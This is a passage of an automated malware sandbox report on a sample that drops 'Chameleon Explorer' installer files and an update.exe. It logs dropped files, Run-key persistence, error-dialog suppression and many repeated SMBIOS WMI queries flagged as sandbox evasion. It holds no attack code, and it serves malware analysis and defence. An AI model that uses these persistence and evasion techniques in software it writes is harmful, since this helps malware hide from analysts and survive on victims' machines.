                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564C028 push 0564C07Eh; ret 2_2_0564C076
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05652010 push ecx; mov dword ptr [esp], edx2_2_05652011
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650888 push ecx; mov dword ptr [esp], ecx2_2_0565088C
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05611B48 push 05611B80h; ret 2_2_05611B78
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565032C push ecx; mov dword ptr [esp], edx2_2_0565032D
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568DB30 push ecx; mov dword ptr [esp], edx2_2_0568DB31
                      Source: is-7RNBS.tmp.2.drStatic PE information: section name: .didata
                      Source: is-FAU52.tmp.2.drStatic PE information: section name: .didata
                      Source: is-4Q1I9.tmp.2.drStatic PE information: section name: .didata
                      Source: is-5C20L.tmp.2.drStatic PE information: section name: .didata
                      Source: is-HQP5N.tmp.2.drStatic PE information: section name: .didata
                      Source: is-LI6V8.tmp.2.drStatic PE information: section name: .didata
                      Source: is-LI6V8.tmp.2.drStatic PE information: section name: JCLDEBUG
                      Source: is-EV8UG.tmp.2.drStatic PE information: section name: .didata
                      Source: is-EV8UG.tmp.2.drStatic PE information: section name: JCLDEBUG
                      Source: Folder64.dll_backup.15.drStatic PE information: section name: .didata
                      Source: Folder64.dll.15.drStatic PE information: section name: .didata
                      Source: Folder.dll_backup.15.drStatic PE information: section name: .didata
                      Source: Folder.dll.15.drStatic PE information: section name: .didata
                      Source: ExplorerHelper32.dll.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper32.dll_backup.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper64.dll.16.drStatic PE information: section name: .didata
                      Source: ExplorerHelper64.dll_backup.16.drStatic PE information: section name: .didata
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.394854300308974
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backupJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmpJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-7RNBS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\update.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-89A92.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)Jump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeFile created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dllJump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Local\Temp\autEDA4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to dropped file
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-LI6V8.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon Explorer\is-EV8UG.tmpJump to dropped file

                      Boot Survival

                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon FolderJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chameleon ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnkJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSmBios_RawSMBiosTables
